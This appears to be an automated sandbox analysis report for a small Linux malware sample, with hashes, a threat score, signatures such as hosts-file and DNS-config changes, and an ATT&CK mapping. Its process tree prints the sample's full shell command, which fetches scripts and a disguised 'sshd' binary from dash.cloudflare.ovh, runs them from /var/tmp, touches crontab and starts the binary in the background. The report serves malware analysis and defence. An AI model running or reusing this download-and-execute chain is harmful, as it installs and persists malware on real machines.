Overview

overview

10

Static

static

10

e4a58509fe...af084d

ubuntu-18.04-amd64

8

Analysis

  • max time kernel
    24131s
  • max time network
    152s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    13-09-2022 23:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d

  • Size

    1KB

  • MD5

    932df67ea6b8900a30249e311195a58f

  • SHA1

    d6b7c2388a75c2c3b71d5ad7130f1d3dfeb7fd83

  • SHA256

    e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d

  • SHA512

    f6801c3cbc1d28e8f4a5373340081528dc1ece23e59585cc45831177710ac785557ebf364bd8a867f0c687ca518f41913427b27ddd2f2ff64e64ae7ba760fc0c

Score
8/10

Malware Config

Signatures

  • Modifies hosts file 1 IoCs

    Adds to hosts file used for mapping hosts to IP addresses.

  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

Processes

  • /tmp/e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d
    /tmp/e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d
    1⤵
      PID:576
    • /bin/sh
      /bin/sh -c "wget -nc http://dash.cloudflare.ovh/mvt/unix.sh -q -P /var/tmp/; chmod 777 /var/tmp/unix.sh; curl http://dash.cloudflare.ovh/mvt/unix.sh -s -o /var/tmp/unix.sh; chmod 777 /var/tmp/unix.sh; cd /var/tmp; ./unix.sh; cd /var/tmp; rm unix.sh; wget -nc http://dash.cloudflare.ovh/mvt/sshd -q -P /var/tmp/; chmod 777 /var/tmp/sshd; curl http://dash.cloudflare.ovh/mvt/sshd -s -o /var/tmp/sshd; chmod 777 /var/tmp/sshd; wget -nc http://dash.cloudflare.ovh/mvt/config.json -q -P /var/tmp/; curl http://dash.cloudflare.ovh/mvt/config.json -s -o /var/tmp/config.json; crontab -l 2>/dev/null | grep -qxF '' || (crontab -l 2>/dev/null ; echo '') | crontab -; wget -nc http://dash.cloudflare.ovh/mvt/truct.sh -q -P /var/tmp/; chmod 777 /var/tmp/truct.sh; curl http://dash.cloudflare.ovh/mvt/truct.sh -s -o /var/tmp/truct.sh; chmod 777 /var/tmp/truct.sh; cd /var/tmp; ./truct.sh 2>/dev/null; cd /var/tmp; rm truct.sh; wget -nc http://dash.cloudflare.ovh/mvt/brict.sh -q -P /var/tmp/; chmod 777 /var/tmp/brict.sh; curl http://dash.cloudflare.ovh/mvt/brict.sh -s -o /var/tmp/brict.sh; chmod 777 /var/tmp/brict.sh; cd /var/tmp; ./brict.sh 2>/dev/null; cd /var/tmp; rm brict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'; wget -nc http://dash.cloudflare.ovh/mvt/retrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/retrict.sh; curl http://dash.cloudflare.ovh/mvt/retrict.sh -s -o /var/tmp/retrict.sh; chmod 777 /var/tmp/retrict.sh; cd /var/tmp; ./retrict.sh 2>/dev/null; cd /var/tmp; rm retrict.sh; wget -nc http://dash.cloudflare.ovh/mvt/politrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/politrict.sh; curl http://dash.cloudflare.ovh/mvt/politrict.sh -s -o /var/tmp/politrict.sh; chmod 777 /var/tmp/politrict.sh; cd /var/tmp; ./politrict.sh 2>/dev/null; cd /var/tmp; rm politrict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'"
      1⤵
        PID:576
        • /usr/bin/wget
          wget -nc http://dash.cloudflare.ovh/mvt/unix.sh -q -P /var/tmp/
          2⤵
          • Modifies hosts file
          • Writes DNS configuration
          PID:577

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Dynamic Resolution

      1
      T1568

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads